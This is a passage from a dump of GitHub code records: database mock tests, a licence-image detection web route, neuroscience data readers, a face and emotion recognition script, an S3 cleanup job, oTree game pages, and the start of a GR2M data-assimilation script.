\"one_z\"])\n expected_2 = set([\"two_x\", \"two_y\"])\n r.db(\"db_one\").table_create(\"one_z\").run(conn)\n result_1 = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected_1, set(list(result_1)))\n\n result_2 = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected_2, set(list(result_2)))\n\n def test_table_create_2(self, conn):\n expected_1 = set([\"one_x\", \"one_y\"])\n expected_2 = set([\"two_x\", \"two_y\", \"two_z\"])\n r.db(\"db_two\").table_create(\"two_z\").run(conn)\n result_1 = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected_1, set(list(result_1)))\n\n result_2 = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected_2, set(list(result_2)))\n\n def test_table_drop_1(self, conn):\n expected_1 = set([\"one_x\"])\n expected_2 = set([\"two_x\", \"two_y\"])\n r.db(\"db_one\").table_drop(\"one_y\").run(conn)\n result_1 = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected_1, set(list(result_1)))\n\n result_2 = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected_2, set(list(result_2)))\n\n def test_table_drop_2(self, conn):\n expected_1 = set([\"one_x\", \"one_y\"])\n expected_2 = set([\"two_x\"])\n r.db(\"db_two\").table_drop(\"two_y\").run(conn)\n result_1 = r.db(\"db_one\").table_list().run(conn)\n assertEqual(expected_1, set(list(result_1)))\n\n result_2 = r.db(\"db_two\").table_list().run(conn)\n assertEqual(expected_2, set(list(result_2)))\n\n\nclass TestDbMod(MockTest):\n @staticmethod\n def get_data():\n return {\n \"dbs\": {\n \"db_one\": {\"tables\": {\"one_x\": [], \"one_y\": []}},\n \"db_two\": {\"tables\": {\"two_x\": [], \"two_y\": []}},\n }\n }\n\n def test_db_list(self, conn):\n expected = set([\"db_one\", \"db_two\"])\n result = self.db_list(conn)\n assertEqual(expected, result)\n\n def test_db_create(self, conn):\n expected = set([\"db_one\", \"db_two\", \"db_three\"])\n r.db_create(\"db_three\").run(conn)\n result = self.db_list(conn)\n assertEqual(expected, result)\n\n def test_db_drop(self, conn):\n expected = set([\"db_one\"])\n r.db_drop(\"db_two\").run(conn)\n result = self.db_list(conn)\n assertEqual(expected, result)\n\n def db_list(self, conn):\n # rethinkdb is special and always present; we don't care, for these tests\n return set(r.db_list().run(conn)) - {\"rethinkdb\"}\n\n\nclass TestDbDefault(MockTest):\n @staticmethod\n def get_data():\n return {\n \"dbs\": {\n \"db_one\": {\n \"tables\": {\n \"one_x\": [\n {\n \"id\": \"x\",\n }\n ],\n \"one_y\": [{\"id\": \"y\", \"one_x_id\": \"x\", \"content\": \"value\"}],\n }\n },\n \"db_two\": {\"tables\": {\"two_x\": [], \"two_y\": []}},\n },\n \"default\": \"db_one\",\n }\n\n def test_db_default(self, conn):\n expected = {\"id\": \"x\"}\n result = r.table(\"one_x\").get(\"x\").run(conn)\n assertEqual(expected, result)\n\n def test_db_default_nested(self, conn):\n expected = {\"id\": \"x\", \"content\": \"value\"}\n result = (\n r.table(\"one_x\")\n .get(\"x\")\n .merge(\n lambda doc: r.table(\"one_y\")\n .filter({\"one_x_id\": doc[\"id\"]})\n .pluck([\"content\"])[0]\n )\n .run(conn)\n )\n assertEqual(expected, result)\n","repo_name":"Inveracity/rethinkdb-mock","sub_path":"tests/functional/test_table_db_mod.py","file_name":"test_table_db_mod.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"27327141425","text":"from mutils.utils import TESTS_IMAGES_DIR, TESTS_OUTPUT_DIR\nfrom .atri import Atri\nfrom fastapi import Request, Response\nfrom atri_utils import *\nfrom pathlib import Path\nfrom cv_transformations.data_field_detection.data_field_detection import run_driving_detection\nimport re\nimport urllib.parse\n\nPath(TESTS_IMAGES_DIR).mkdir(parents=True, exist_ok=True)\nPath(TESTS_OUTPUT_DIR).mkdir(parents=True, exist_ok=True)\n\ndef test_image_exists(filename: str):\n full_path = Path(TESTS_IMAGES_DIR) / filename\n if Path.exists(full_path):\n return True\n return False\n\ndef create_filename(filename: str, count: int):\n stem = Path(filename).stem + str(count)\n suffix = Path(filename).suffix\n return stem + suffix\n\ndef init_state(at: Atri):\n \"\"\"\n This function is called everytime \"Publish\" button is hit in the editor.\n The argument \"at\" is a dictionary that has initial values set from visual editor.\n Changing values in this dictionary will modify the intial state of the app.\n \"\"\"\n at.preview_wrapper.styles.display = \"none\"\n\ndef handle_page_request(at: Atri, req: Request, res: Response, query: str):\n \"\"\"\n This function is called whenever a user loads this route in the browser.\n \"\"\"\n pass\n\ndef handle_event(at: Atri, req: Request, res: Response):\n \"\"\"\n This function is called whenever an event is received. An event occurs when user\n performs some action such as click button.\n \"\"\"\n # check if file upload event has been triggered\n if at.Upload1.onChange:\n # sanity check if user has successfully uploaded a file\n if at.Upload1.io.files != None:\n files = at.Upload1.io.files\n # check if user has uploaded one or more files\n if len(files) > 0:\n uploadFile = files[0]\n binaryFile = uploadFile.file\n filename = uploadFile.filename\n data = binaryFile.read()\n count = 0\n while True:\n final_filename = filename if count == 0 else create_filename(filename, count)\n if not test_image_exists(final_filename):\n break\n count = count + 1\n \n final_full_path = Path(TESTS_IMAGES_DIR) / final_filename\n print(str(final_full_path))\n with open(str(final_full_path), \"wb\") as f:\n f.write(data)\n at.preview_wrapper.styles.display = \"flex\"\n at.preview.custom.src = create_media_response(data, filename)\n at.image_placeholder.styles.display = \"none\"\n at.filename.custom.text = final_filename\n \n if at.runtest.onClick:\n # TODO: run test\n final_filename = at.filename.custom.text\n final_input_path = Path.joinpath(Path.cwd(), Path(TESTS_IMAGES_DIR) / final_filename)\n final_output_path = Path.joinpath(Path.cwd(), Path(TESTS_OUTPUT_DIR) / final_filename)\n if Path.exists(final_input_path):\n # TODO: get data from test result\n fin = run_driving_detection(str(final_input_path))\n # write output fields\n if \"name\" in fin:\n name = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"name\"])\n else:\n name = \"N/A\"\n\n if \"license_number\" in fin:\n lno = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"license_number\"])\n else:\n lno = \"N/A\"\n\n if \"date_of_birth\" in fin:\n dob = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"date_of_birth\"])\n else:\n dob = \"N/A\"\n\n if \"expiry_date\" in fin:\n exp = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"expiry_date\"])\n else:\n exp = \"N/A\"\n\n if \"address\" in fin: \n address = re.sub(r'[^\\x00-\\x7F]+',' ', fin[\"address\"])\n else:\n address = \"N/A\"\n query = {\n \"testname\": final_filename,\n \"name\": name,\n \"lno\": lno,\n \"dob\": dob,\n \"exp\": exp,\n \"address\": address\n }\n url = \"/newtestresult?\" + urllib.parse.urlencode(query)\n res.headers.append(\"location\", url)\n\n\n","repo_name":"Atri-Apps/cv_workbench","sub_path":"controllers/routes/newtest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"23687714003","text":"import numpy as np\n\n# alternative: redis for shared in-memory cache\n\n_storage = {}\n\ndef store(data):\n key = data.get('identifier')\n ranges = data.get('ranges', [])\n _storage[key] = {\n \"ranges\": ranges,\n \"arrays\": [np.array(xrange(x[0],x[1]+1)) for x in ranges if len(x) == 2]\n }\n return True\n\ndef get_storage():\n return _storage\n\n","repo_name":"john5223/ranger","sub_path":"ranger/services/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42562628928","text":"import h5py as h5\nimport glob\nimport os\nimport numpy as np\nimport pandas as pd\n\nfrom open_ephys_archived.analysis.recording import Recording\n\nclass KwikRecording(Recording):\n \n class Spikes:\n \n def __init__(self, dataset, channel_count, recording_index):\n \n timestamps = []\n waveforms = []\n electrodes = []\n \n self.metadata = {}\n self.metadata['names'] = list(dataset.keys())\n \n for i, electrode in enumerate(dataset.keys()):\n \n if dataset[electrode]['waveforms_filtered'].shape[2] == channel_count:\n \n mask = dataset[electrode]['recordings'][()] == recording_index\n \n timestamps.append(dataset[electrode]['time_samples'][()][mask])\n waveforms.append(np.swapaxes(dataset[electrode]['waveforms_filtered'][()][mask,:,:],1,2))\n electrodes.append(np.array([i] * len(timestamps[-1])))\n\n self.timestamps = np.concatenate(timestamps)\n self.waveforms = np.concatenate(waveforms, axis=0)\n self.electrodes = np.concatenate(electrodes)\n \n order = np.argsort(self.timestamps)\n \n self.timestamps = self.timestamps[order]\n self.waveforms = self.waveforms[order,:,:]\n self.electrodes = self.electrodes[order]\n \n class Continuous:\n \n def __init__(self, file, recording_index):\n \n f = h5.File(file, 'r')\n \n dataset = f['recordings'][str(recording_index)]\n \n self.samples = dataset['data'][()]\n \n start_time = dataset['application_data']['timestamps'][()][0][0]\n\n self.timestamps = np.arange(start_time, start_time + self.samples.shape[0])\n \n self.metadata = {}\n self.metadata['processor_id'] = int(os.path.basename(file).split('_')[1].split('.raw')[0])\n self.metadata['subprocessor_id'] = 0 # format doesn't support subprocessors\n self.metadata['sample_rate'] = dataset['application_data']['channel_sample_rates'][0]\n \n f.close()\n \n def __init__(self, directory, experiment_index=0, recording_index=0):\n \n Recording.__init__(self, directory, experiment_index, recording_index) \n self._format = 'kwik'\n \n def load_continuous(self):\n \n kwd_files = glob.glob(os.path.join(self.directory, 'experiment' +\n str(self.experiment_index + 1) + '*.kwd'))\n \n if len(kwd_files) > 0:\n \n self._continuous = [self.Continuous(file, self.recording_index) for file in kwd_files]\n \n \n def load_spikes(self):\n \n spikes_file = os.path.join(self.directory, 'experiment' + str(self.experiment_index + 1) + '.kwx')\n \n f = h5.File(spikes_file, 'r')\n \n electrodes = f['channel_groups']\n \n spikes = [self.Spikes(electrodes, channel_count, self.recording_index) for channel_count in (1,2,4)]\n \n self._spikes = [S for S in spikes if len(S.timestamps) > 0]\n \n f.close()\n \n def load_events(self):\n \n events_file = os.path.join(self.directory, 'experiment' + str(self.experiment_index + 1) + '.kwe')\n \n f = h5.File(events_file, 'r')\n \n recordings = f['event_types']['TTL']['events']['recording'][()]\n timestamps = f['event_types']['TTL']['events']['time_samples'][()]\n \n mask = recordings == self.recording_index\n \n dataset = f['event_types']['TTL']['events']['user_data']\n \n self._events = pd.DataFrame(data = {'channel' : dataset['event_channels'][()][mask] + 1,\n 'timestamp' : timestamps[mask],\n 'processor_id' : dataset['nodeID'][()][mask],\n 'subprocessor_id' : [0] * np.sum(mask),\n 'state' : dataset['eventID'][mask].astype('int')})\n \n f.close()\n \n def __str__(self):\n \"\"\"Returns a string with information about the Recording\"\"\"\n \n return \"Open Ephys GUI Recording\\n\" + \\\n \"ID: \" + hex(id(self)) + '\\n' + \\\n \"Format: Kwik\\n\" + \\\n \"Directory: \" + self.directory + \"\\n\" + \\\n \"Experiment Index: \" + str(self.experiment_index) + \"\\n\" + \\\n \"Recording Index: \" + str(self.recording_index)\n \n\n \n \n ########################################################\n \n @staticmethod\n def detect_format(directory):\n kwik_files = glob.glob(os.path.join(directory, '*.kw*'))\n\n if len(kwik_files) > 0:\n return True\n else:\n return False\n \n @staticmethod\n def detect_recordings(directory):\n \n recordings = []\n \n found_recording = False\n \n kwe_files = glob.glob(os.path.join(directory, 'experiment*.kwe'))\n kwe_files.sort()\n \n if len(kwe_files) > 0:\n \n for experiment_index, file in enumerate(kwe_files):\n print(file)\n \n f = h5.File(file, 'r')\n \n for recording_index, r in enumerate(f['recordings'].keys()):\n \n recordings.append(KwikRecording(directory,\n experiment_index,\n recording_index))\n \n f.close()\n \n found_recording = True\n \n if not found_recording:\n \n kwd_files = glob.glob(os.path.join(directory, 'experiment*.kwd'))\n kwd_files.sort()\n \n if len(kwd_files) > 0:\n \n for experiment_index, file in enumerate(kwd_files):\n \n f = h5.File(file, 'r')\n \n for recording_index, r in enumerate(f['recordings'].keys()):\n \n recordings.append(KwikRecording(directory,\n experiment_index,\n recording_index))\n \n f.close()\n \n found_recording = True\n \n if not found_recording:\n \n kwx_files = glob.glob(os.path.join(directory, 'experiment*.kwx'))\n kwx_files.sort()\n \n if len(kwx_files) > 0:\n \n for experiment_index, file in enumerate(kwx_files):\n \n f = h5.File(file, 'r')\n \n for recording_index, r in enumerate(f['recordings'].keys()):\n \n recordings.append(KwikRecording(directory,\n experiment_index,\n recording_index))\n \n f.close()\n \n found_recording = True\n \n \n if not found_recording:\n raise(IOError('Could not find any data files.'))\n \n return recordings","repo_name":"LBHB/nems_db","sub_path":"open_ephys_archived/analysis/formats/KwikRecording.py","file_name":"KwikRecording.py","file_ext":"py","file_size_in_byte":7687,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"8969591577","text":"import datetime\nimport os\nimport sys\nimport cv2\nimport face_recognition\nimport numpy as np\nimport logging\nimport settings\nfrom pathlib import Path\nimport requests\nimport socket\n\nfrom keras.models import load_model\nfrom statistics import mode\nfrom utils.datasets import get_labels\nfrom utils.inference import detect_faces\nfrom utils.inference import draw_text\nfrom utils.inference import draw_bounding_box\nfrom utils.inference import apply_offsets\nfrom utils.inference import load_detection_model\nfrom utils.preprocessor import preprocess_input\nfrom flask import session\n\n## Enable these imports to find FPS\n#import argparse\n#from imutils.video import FPS\n#from imutils.video import WebcamVideoStream\n##\n\n\n\nlogging.basicConfig(filename=settings.LOG_PATH, level=logging.INFO)\nstop_check = False\n# Read data from stdin\ndef read_in():\n lines = sys.stdin.readline()\n return lines\n\ndef status(status):\n global stop_check\n stop_check = status\n\n# Function to check if the person is authorised based on certain parameters\ndef authorised(name):\n return not \"Unknown\" in name\n\n\ndef face_recognise(post_ip, post_port, videoFeedIp, videoFeedPort, videoFeedUrl):\n#def main():\n # Getting known encodings and Names\n # parameters for loading data and images\n emotion_model_path = settings.MODEL_PATH+'/emotion_model.hdf5'\n emotion_labels = get_labels('fer2013')\n\n face_cascade = cv2.CascadeClassifier(settings.MODEL_PATH+'/haarcascade_frontalface_default.xml')\n emotion_classifier = load_model(emotion_model_path)\n # hyper-parameters for bounding boxes shape\n frame_window = 10\n emotion_offsets = (20, 40)\n # getting input model shapes for inference\n emotion_target_size = emotion_classifier.input_shape[1:3]\n\n # starting lists for calculating modes\n emotion_window = []\n\n########################################################################\n\n\n known_encodings_file_path = settings.DATA_PATH + '/known_encodings_file.csv'\n people_file_path = settings.DATA_PATH + '/people_file.csv'\n\n # # Check the encoded files are present in the File Path, if not create a new File\n if (not os.path.exists(known_encodings_file_path)):\n known_encode = open(known_encodings_file_path, \"w+\")\n known_encode.close()\n if (not os.path.exists(people_file_path)):\n people_file = open(people_file_path, \"w+\")\n people_file.close()\n\n known_encodings_file = Path(known_encodings_file_path)\n if known_encodings_file.is_file():\n known_encodings = np.genfromtxt((known_encodings_file), delimiter=',')\n else:\n known_encodings = []\n\n # For Storing the name corresponding to the encoding\n people_file = Path(people_file_path)\n if people_file.is_file():\n people = np.genfromtxt((people_file), dtype='U', delimiter=',')\n else:\n people = []\n\n # Capture Video indefinitely\n# url = settings.IP_CAMERA\n url = \"http://\" + videoFeedIp + \":\" + videoFeedPort + \"/\" + videoFeedUrl\n video_capture = cv2.VideoCapture(url)\n #WebcamVideoStream(src=url).start()\n #fps = FPS().start()\n\n original_width = video_capture.get(cv2.CAP_PROP_FRAME_WIDTH)\n original_height = video_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n face_locations = []\n face_encodings = []\n face_names = []\n process_this_frame = True\n\n while True:\n\n if (stop_check):\n break\n\n # which also affected this process(don't know why) so to convert it to original size\n if video_capture.get(cv2.CAP_PROP_FRAME_WIDTH) != original_width or video_capture.get(\n cv2.CAP_PROP_FRAME_HEIGHT) != original_height:\n video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, original_width)\n video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, original_height)\n\n ret, frame = video_capture.read()\n frame_captured = str(datetime.datetime.now())\n\n\n #fps.update()\n # Don't proceed further until camera is able to capture pics\n if not ret:\n continue\n\n gray_image = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rgb_image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n faces = face_cascade.detectMultiScale(gray_image, scaleFactor=1.1, minNeighbors=5,\n minSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n for face_coordinates in faces:\n\n x1, x2, y1, y2 = apply_offsets(face_coordinates, emotion_offsets)\n gray_face = gray_image[y1:y2, x1:x2]\n try:\n gray_face = cv2.resize(gray_face, (emotion_target_size))\n except:\n continue\n\n gray_face = preprocess_input(gray_face, True)\n gray_face = np.expand_dims(gray_face, 0)\n gray_face = np.expand_dims(gray_face, -1)\n emotion_prediction = emotion_classifier.predict(gray_face)\n emotion_probability = np.max(emotion_prediction)\n emotion_label_arg = np.argmax(emotion_prediction)\n emotion_text = emotion_labels[emotion_label_arg]\n emotion_window.append(emotion_text)\n\n if len(emotion_window) > frame_window:\n emotion_window.pop(0)\n try:\n emotion_mode = mode(emotion_window)\n except:\n continue\n\n if emotion_text == 'angry':\n color = emotion_probability * np.asarray((255, 0, 0))\n elif emotion_text == 'sad':\n color = emotion_probability * np.asarray((0, 0, 255))\n elif emotion_text == 'happy':\n color = emotion_probability * np.asarray((255, 255, 0))\n elif emotion_text == 'surprise':\n color = emotion_probability * np.asarray((0, 255, 255))\n else:\n color = emotion_probability * np.asarray((0, 255, 0))\n\n color = color.astype(int)\n color = color.tolist()\n\n draw_bounding_box(face_coordinates, rgb_image, color)\n draw_text(face_coordinates, rgb_image, emotion_mode,\n color, 0, -45, 1, 1)\n\n frame = cv2.cvtColor(rgb_image, cv2.COLOR_RGB2BGR)\n\n\n # smaller frame 1/4th of original size\n small_frame = cv2.resize(frame, (0, 0), fx=.25, fy=.25)\n\n if process_this_frame:\n # Find the face locations\n face_locations = face_recognition.face_locations(small_frame)\n # Find the face encodings 128 Dimensional!!\n face_encodings = face_recognition.face_encodings(small_frame, face_locations)\n\n face_names = []\n other = 0 # Count of un-authorised people\n for face_encoding in face_encodings:\n\n # Find metrics to match the face encodings with known encodings\n match = face_recognition.compare_faces(known_encodings, face_encoding)\n\n\n name = \"Unknown\"\n files = 'empty'\n # Find if this person is in the present people array\n for i in range(len(match)):\n if match[i]:\n name = people[i]\n face_detected = str(datetime.datetime.now())\n logging.info(\"Frame captured : : \" + frame_captured)\n logging.info(\"Face Detected : : \" + face_detected + \" : : \" + name)\n values = {'name': name, 'hostname': socket.gethostname(), 'timestamp': face_detected}\n url = \"http://\" + post_ip + \":\" + post_port + \"/sendNameOfUser\"\n ###############################################\n send_to_ui = requests.post(url, data=values)\n ###############################################\n break\n\n # Change it, run the loop to find no. of Unknown\n if \"Unknown\" in name:\n other += 1\n name += str(other)\n face_names.append(name)\n\n\n\n print('Name' +str( face_names))\n\n\n\n\n process_this_frame = not process_this_frame\n # stop the timer and display FPS information\n #fps.stop()\n # logging.info(\"Elasped time : : \"+str(fps.elapsed()))\n # logging.info(\"Approx. FPS : : \"+str(fps.fps())+\"\\n\")\n\n # #Display the border\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n # Scale up the coordinates by 4 to get face\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n # Assuming person in authenticated\n color = (0, 255, 0) # GREEN\n if not authorised(name):\n # Unauthenticated person\n color = (0, 0, 255) # RED\n # Display border\n cv2.rectangle(frame, (left, top), (right, bottom), color, 2)\n # Draw a label with name\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), color, cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n # Display the resulting image with borders and names\n cv2.imshow('Video', frame)\n # Hit 'q' on keyboard to quit\n if cv2.waitKey(100) == 27:\n break\n\n # Release handle to the webcam\n video_capture.release()\n #cv2.closeAllWindows()\n cv2.destroyAllWindows()\n pass\n\n#\n# if __name__ == \"__main__\":\n# main()\n\n","repo_name":"KarthikeyanODL/Voss","sub_path":"mec/MEC-analytics/api/analytics/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"25751221140","text":"import json\nimport os, time\nimport boto3\nimport pymysql\n# to edit put it in a directory with all the requirements and then run following to upload to AWS. The regex makes sure it includes hidden folders: zip -r package.zip * .[^.]* \nos.environ['TZ'] = 'UTC'\ntime.tzset()\n\ndef deletor():\n print(\"[INFO] Starting\")\n \n '''\n Establish a connection to the Database\n '''\n \n dbConnection = pymysql.connect(\n host=os.environ.get('MYSQL_HOSTNAME'),\n user=os.environ.get('MYSQL_USER'),\n passwd=os.environ.get('MYSQL_PASSWORD'),\n database=os.environ.get('MYSQL_DATABASE')\n )\n \n dbCursor = dbConnection.cursor(pymysql.cursors.DictCursor)\n print(\"[INFO] DB Connected\")\n \n '''\n Establish a S3 connection\n '''\n s3client = boto3.client('s3',\n endpoint_url=os.environ['AWS_ENDPOINT_URL'],\n aws_access_key_id=os.environ['python__AWS_SERVER_KEY'],\n aws_secret_access_key=os.environ['python__AWS_SERVER_SECRET_KEY']\n )\n\n print(\"[INFO] S3 Connected\")\n \n print(\"[INFO] Remove files from S3 that are due to be deleted\")\n dbCursor.execute(\"SELECT s3files_bucket,s3files_path,s3files_filename,s3files_extension,s3files_id FROM s3files WHERE s3files_meta_deleteOn IS NOT NULL AND s3files_meta_deleteOn <= CURRENT_TIMESTAMP() AND s3files_meta_physicallyStored = 1\") #Select everything that needs deleting\n listOfFiles = dbCursor.fetchall()\n counter = 0\n for file in listOfFiles:\n deleteRequest = s3client.delete_object(Bucket=str(file['s3files_bucket']), Key=str(file['s3files_path'])+\"/\"+str(file['s3files_filename'])+\".\"+str(file['s3files_extension']))\n if (True):\n #Not yet possible to verify if the file has been deleted or not\n print(\"[RESULT] Found file that needs deleting (id \" + str(file['s3files_id']) + \" = \" + str(file['s3files_path'])+\"/\"+str(file['s3files_filename'])+\".\"+str(file['s3files_extension']) + \") & has now been deleted - updating DB\")\n dbCursor.execute(\"UPDATE s3files SET s3files_meta_physicallyStored = 0 WHERE s3files_id = '\" + str(file['s3files_id']) + \"'\")\n dbConnection.commit()\n counter = counter + 1\n else:\n print(\"[ERROR] Could not delete file with id \" + str(file['s3files_id']) + \" and path \" + str(file['s3files_path'])+\"/\"+str(file['s3files_filename'])+\".\"+str(file['s3files_extension']))\n \n return counter\n\ndeletor()\nprint(\"[INFO] Completed Script - waiting a bit\")\ntime.sleep(int(os.environ.get('SLEEP_TIME',10)))\nprint(\"[INFO] Completed wait - restarting\")\n","repo_name":"adam-rms/adam-rms-s3Deletor","sub_path":"deletor.py","file_name":"deletor.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17221984265","text":"TOKEN_K = 4\nWORD_K = 0.75\n\n\ndef tokenize(text: str):\n char_count = len(text)\n word_count = len(text.split())\n\n tokens_by_chars = int(char_count / TOKEN_K)\n tokens_by_words = int(word_count / WORD_K)\n\n return int((tokens_by_chars + tokens_by_words) / 2)\n","repo_name":"sound-round/chatGPT-telegram-bot","sub_path":"chatgpt_telegram_bot/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42985270966","text":"from otree.api import Currency as c, currency_range\r\nfrom ._builtin import Page, WaitPage\r\nfrom .models import Constants\r\n\r\nclass RoundBeginWait(WaitPage):\r\n after_all_players_arrive = 'begin'\r\n\r\n\r\nclass Round(Page):\r\n form_model = 'player'\r\n def get_form_fields(self):\r\n if self.player.id_in_group == self.group.A_id:\r\n return []\r\n else:\r\n return ['is_selfish']\r\n\r\n\r\nclass RoundWait(WaitPage):\r\n # 正常等待--所有人结束\r\n after_all_players_arrive = 'set_deposit'\r\n\r\nclass AChoice(Page):\r\n form_model = 'group'\r\n form_fields = ['A_continue']\r\n def is_displayed(self):\r\n return self.player.id_in_group == self.group.A_id\r\n\r\nclass AChoiceWait(WaitPage):\r\n # 所以角色B等待\r\n after_all_players_arrive = 'set_A_choice'\r\n\r\nclass BVote(Page):\r\n form_model = 'player'\r\n def get_form_fields(self):\r\n if self.player.id_in_round == self.group.A_continue:\r\n return []\r\n else:\r\n return ['B_vote']\r\n def is_displayed(self):\r\n return self.group.A_continue != 0 and self.player.id_in_group != self.group.A_id\r\n\r\nclass BVoteWait(WaitPage):\r\n # A等待\r\n after_all_players_arrive = 'set_B_vote'\r\nclass Show(Page):\r\n pass\r\n\r\npage_sequence = [\r\n RoundBeginWait,\r\n Round,\r\n RoundWait,\r\n AChoice,\r\n AChoiceWait,\r\n BVote,\r\n BVoteWait,\r\n Show,\r\n]\r\n","repo_name":"philzhxu/symbolpgg0","sub_path":"round_base/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72199987738","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n## -- Script Meta Data --\n## Author : ler015\n## Created : 2023-10-24 08:49:29.817157\n## Comment : DAISI STEP 1\n## Ensemble Smoother data assimilation applied to the GR2M model\n##\n## ------------------------------\n\nimport sys, os, re, json, math\nimport argparse\nfrom itertools import product as prod\nfrom pathlib import Path\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport numpy as np\nimport pandas as pd\n\nfrom hydrodiy.io import csv, iutils\nfrom hydrodiy.io.hyruns import SiteBatch\n\nfrom pygme import factory\nfrom pydaisi import daisi_data, gr2m_update, gr2m_ensmooth,\\\n daisi_perf\n\nfrom select_sites import select_sites\n\nimport importlib\nimportlib.reload(gr2m_ensmooth)\n\n#----------------------------------------------------------------------\n# Config\n#----------------------------------------------------------------------\nparser = argparse.ArgumentParser(\\\n description=\"DAISI STEP 1 - data assimilation\", \\\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument(\"-d\", \"--debug\", help=\"Debug mode (restricted site list)\", \\\n action=\"store_true\", default=False)\nparser.add_argument(\"-t\", \"--taskid\", help=\"Site batch number (task id)\",\\\n type=int, default=-1)\nparser.add_argument(\"-n\", \"--nbatch\", help=\"Number of site batches\", \\\n type=int, default=4)\nparser.add_argument(\"-fo\", \"--folder_output\", help=\"Output folder\", \\\n type=str, default=None)\nargs = parser.parse_args()\n\ndebug = args.debug\ntaskid = args.taskid\nnbatch = args.nbatch\n\nfolder_output = args.folder_output\nif not folder_output is None:\n folder_output = Path(folder_output)\n assert folder_output.exists()\n\n# Model calibrated in this script\n# See pygme.models for a list of potential models\nmodel_name = \"GR2M\"\n\n# Objective functions\nobjfun_names = [\"kge\", \"bc02\"]\n\ncalperiods = [\"per1\", \"per2\"]\n\n# Configure data assimilation\nnens = 500\n\n# .. assimilation variable box-cox transformation\nlamP = 0.\nlamE = 1.0\nlamQ = 0.2\nnu = 1.\n\n# .. Config perturbation\nalphae = 0.1\n\n# .. create ensmooth config dictionary\n# .. (reduction factor applied to stdev)\nstate_names = [\"P\", \"E\", \"S\", \"P3\", \"R\", \"Q\", \"Q_obs\"]\nstdfacts = {n:alphae for n in state_names}\n\n#----------------------------------------------------------------------\n# Folders\n#----------------------------------------------------------------------\nsource_file = Path(__file__).resolve()\nfroot = source_file.parent.parent\n\nfout = froot / \"outputs\" / \"STEP1_data_assimilation\"\nif not folder_output is None:\n fout = folder_output / \"STEP1_data_assimilation\"\nfout.mkdir(exist_ok=True, parents=True)\n\nfcalib = fout.parent / \"STEP0_gr2m_calibration\"\n\n#----------------------------------------------------------------------\n# Logging\n#----------------------------------------------------------------------\nbasename = source_file.stem\nflog = froot / \"logs\" / f\"{basename}_TASK{taskid}.log\"\nif not folder_output is None:\n flog = folder_output / \"logs\" / f\"{basename}_TASK{taskid}.log\"\nflog.parent.mkdir(exist_ok=True)\nLOGGER = iutils.get_logger(basename, flog=flog, contextual=True, console=False)\n\n#----------------------------------------------------------------------\n# Get data\n#----------------------------------------------------------------------\n\n# Select siteids. All sites by default.\nsites = select_sites(daisi_data.get_sites(), debug, nbatch, taskid)\n\n# Calibration periods\nperiods = daisi_data.Periods()\n\n#----------------------------------------------------------------------\n# Process\n#----------------------------------------------------------------------\nmodel = factory.model_factory(model_name)\nnsites = len(sites)\nperfs = []\n\nfor isite, (siteid, sinfo) in enumerate(sites.iterrows()):\n LOGGER.context = f\"{siteid} ({isite+1}/{nsites})\"\n\n LOGGER.info(\"Load data\")\n mthly = daisi_data.get_data(siteid)\n\n for objfun_name, calperiod in prod(objfun_names, calperiods):\n LOGGER.info(\"\")\n LOGGER.info(f\"{objfun_name} - Period {calperiod}\")\n\n # Assimilation output folder\n fassim = fout / f\"assim_{objfun_name}\"\n fassim.mkdir(exist_ok=True)\n\n fimg = fassim / \"images\"\n fimg.mkdir(exist_ok=True)\n\n # Instanciate model\n model = gr2m_update.GR2MUPDATE()\n\n # Set transform\n model.lamQ = lamQ\n model.lamP = lamP\n model.lamE = lamE\n model.nu = nu\n\n # Calibration period\n calp = periods.get_periodset(calperiod)\n idxcal = calp.total.select_index(mthly.index)\n idxcal_active = calp.active.select_index(mthly.index)[idxcal]\n\n # Get streamflow data during calib\n Qobs = mthly.Qobs.loc[idxcal]\n Qobs[~idxcal_active] = np.nan\n Qobscal = Qobs.copy()\n\n obs = pd.DataFrame({\"Q\": Qobs})\n obscal = pd.DataFrame({\"Q\": 